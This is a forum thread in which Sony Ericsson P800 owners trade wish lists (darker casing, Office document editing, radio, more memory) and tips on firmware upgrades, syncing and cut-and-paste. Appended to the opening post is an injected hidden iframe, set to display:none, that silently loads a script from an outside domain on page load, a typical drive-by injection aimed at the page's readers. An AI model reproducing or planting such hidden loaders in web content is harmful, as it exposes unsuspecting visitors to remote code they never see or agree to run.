+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Wish list

kat

Wish list

Just in case someone is watching in, what would you like to see for the P800?

1)I want a black casing to replace this girly powder-blue/silver
    2)Black stylii would be nice too
    3)Word proccessor (if the screen was used lengthways the on-screen keyboard could be bigger)
    4)Movie software (why can't it already record little movies?)
    5)Remote control software (I'd love to have this thing in control of my stereo/TV/etc)

Anyone else want to add to this?!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Scrolling

I Wish that I could scroll by one row, too. Sometimes is the field right behind the scrollbar and I cant see, what's in there.

Delete button would be useful anywhere.

I wish that help had the search command.

I wish that it can also use Graffiti (Palm's input methos) rather than the super sensitive JOT. Its really frustrating.

I would also like to see a sleek protective cover (with nothing on it) to replace the bulky key pad. I now use it with the cover removed and it just lacks protection.

More to add to the wishlist.

- Camera cover!!!
    - At least 64M of built-in memory. You can't really get anything done even with the 16M MS Duo.
    - A built in radio would be nice :o
    - Just be greedy I would like 50% more standby/talk time. For me the phone only lasts 2 days of mixed use. 3 days would be splendid just like my trusty nokia 6610.

kat
    yeah - 16meg was a bit tight considering they built in an mp3 player - 4 whole songs!!
    To be honest - I think the camera bit is a gimmick - I'd rather have a built in tv/radio than a camera

64M of built-in memory

You can get (buy) a memorystick duo 128MB! I have one and it works just fine. Try Ebay for it from seller NACHY1818.

Yeah, I dumped my 64m for the 128m.... Superb!

Just upgraded my firmware to R2F and some of my wish has been answered.

- cut and paste on all text input areas (like my old Pocket PC)
    - Much better pictures in low light conditions
    - Wide screen viewing in video
    - easier to control audio player
    - better picture viewing

what's still needed
    - camera cover!!!
    - "Undo" on all applications
    - slimmer keypad (because its too thick I use mine with the cover off)
    - flat black or titanium coloured casing instead of the dreadful blue/ white
    - editing of MS office documents
    - Improved document viewer (now excel and powerpoint files look funny)

Minor gripes for an incredible machine!!

You are fully correct with what's still needed. Especially editing of MS Office files such of Access would be very nice indeed! One question, how did you upgraded the firmware for the P800? How can i do that?

Editor and Site Administrator Convergent's Avatar
    That would be good to add to our FAQ if you can document the steps and url.
    Mike - Been Converged?

Sorry it took so long.

From what I know, the only way to do it properly is by your local Sony Ericsson service centre. It should be free (for my area it was) and it should take 3-5 hours.

I have heard rumors of people doing it by themselves with the USB cradle.

Unless you are a SE engineer, I don't recommend it... It's free and it take you only a couple of hours

To your previos post:

I agree with your wish list, but would not call "minor" some of the missing features, especially not being able to edit Office files, I've been doing that since my first Philips Velo CE 1.0 machine!!

JOTS notes can not be transferred to the PC, nor are the Office handwritten Notes, so they are mostly "confined" to the P800. To me that renders them useless.

Looks like we are closing to Texas Instruments WANDA concept, but too slowly to my needs and desires.

I find that not being able to edit office documents a pain also. Hope they can port something from the symbian machines real quick!

Deleting contacts

Is there any way to delete all contacts from the P800,???? Is there any full reset of the phone??

There's a master reset button under the control panel menu.

I concur about the need for (a) Office document editing software and (b) an FM tuner.

I'd also like to see the phone switching on & off directly without having to go through the flight mode check box. This could be under a separate menu under Phone, surely.

I quite like the camera, but would like to see a directional lens. And another 1 megapixels - as I believe the new version is going to have.

Yes, yes, I know - I've just this minute noticed the option of switching off the flight mode menu under Phone preferences. Much better.

1. Better resolution screen - make colors more vibrant
    2. yup I agree with MS office document editor
    3. Allow MP3 as ringtone
    4. metal casing
    TOPSDMAN

What about a fully functional AND informative Sync application?
    Looks like only a few of us are having sync problems.

Any help or aditional info from Sony Ericsson about this issue?

Nice when it works as advertised, but I've spent most of my time since I got my P800 trying to sync the full contact list from Outlook (and being sure it was OK). And that was my primary reason to purchase a P800!
    It never happened with Activesync, all the info was there.

I was happy thinking: "I got rid of Microsoft with my first Phone-PDA", but I'm missing too much the simplicity of the Activesync application. If I can not fix it, this is going to be my "shortest" experience with a phone since I past along my siemens S45 (very long list: several Nokias, Motorolas, Ericsson, Siemens, Alcatel, Maxtor, Sony, Panasonic ...)

Best Regards

Originally posted by P800 Freak
    Yeah, I dumped my 64m for the 128m.... Superb!

Just upgraded my firmware to R2F and some of my wish has been answered.

- cut and paste on all text input areas (like my old Pocket PC)

- editing of MS office documents
    - Improved document viewer (now excel and powerpoint files look funny)

Minor gripes for an incredible machine!!

Hi Freak!

Sorry to bother you, but how have you been able to "cut and paste"? There is no option to "select" anything on any field of contacts for instance. I can't find the way to do what you say. Any help?

Thanks.

To cut & paste from contact fileds, you need to select the field you want to cut from, then pull up the keyboard using the keyboard icon. You can then select as much as you want to cut by dragging over it with the stylus and then use the drop down menu within the text dialogue box (the light blue arrow head) to cut/copy.

Thanks so much for your help, rusquel.

I've been tweaking over this thing after my post, and have found that keeping the stilus pressing over a contact field during a few seconds, "overrides" the "jotting" function, and works as the usual "click and drag-select" with the mouse in Windows, and then the option to "copy" is activated in the menu (no need to pull up the keyboard). A bit akward but fully functional once you get used to.

Share more findings with the forum, I didn't knew about this one from the manuals.